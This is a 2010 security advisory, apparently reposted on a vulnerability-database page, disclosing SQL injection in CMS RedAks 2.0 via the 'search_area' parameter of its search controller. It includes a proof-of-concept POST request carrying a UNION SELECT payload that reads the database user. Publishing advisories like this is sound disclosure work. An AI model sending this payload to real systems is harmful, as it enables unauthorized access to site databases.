CMS RedAks 2.0 - SQL injection vulnerability

2010.06.17

Credit: David Vieira-Kurz of MajorSecurity

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

[MajorSecurity SA-075]CMS RedAks 2.0 - SQL injection vulnerability

Details
=============
Product: CMS RedAks v.2.0
Security-Risk: high
Remote-Exploit: yes
Vendor-URL: http://www.redaks.com/
Advisory-Status: published

Credits
=============
Discovered by: David Vieira-Kurz of MajorSecurity

Original Advisory
=============
http://www.majorsecurity.net/redaks_cms_sql_injection.php

Affected Products:
=============
CMS RedAks v.2.0
Prior versions may also be vulnerable

=============
"CMS RedAks is a web based content management system."

More Details
=============
We at MajorSecurity have discovered some vulnerabilities in CMS RedAks v.2.0, which can be exploited to conduct sql injection attacks. Input passed directly to the "search_area" POST parameter in "/search/" Controller is not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Proof of Concept
=============
POST /search/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; de; rv:1.9.2.3)
Gecko/20100401 Firefox/3.6.2 MajorSecurity
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://localhost
Cookie: PHPSESSID=e735166dcb9afcbfaf38d2c1fc41c9d8; cnt_monitor=1440x900;
Content-Type: multipart/form-data;
boundary=---------------------------315562279830303
Content-Length: 365

-----------------------------315562279830303
Content-Disposition: form-data; name="searchExtended"

1
-----------------------------315562279830303
Content-Disposition: form-data; name="search_inall"

avxas
-----------------------------315562279830303
Content-Disposition: form-data; name="search_area"

1'"%20union%20select%201,user%28%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%20/*
-----------------------------315562279830303--

Solution
=============
Web applications should never trust on user generated input and therefore sanatize all input. Edit the source code to ensure that input is properly sanitised.

MajorSecurity
=============
MajorSecurity is a German penetrationtesting and security research company which focuses on web application security. We offer professional penetrationstest, security audits, source code reviews and pci dss compliance tests. Visit us at 

http://www.majorsecurity.net/penetrationstest.php

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

CMS RedAks 2.0 - SQL injection vulnerability

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.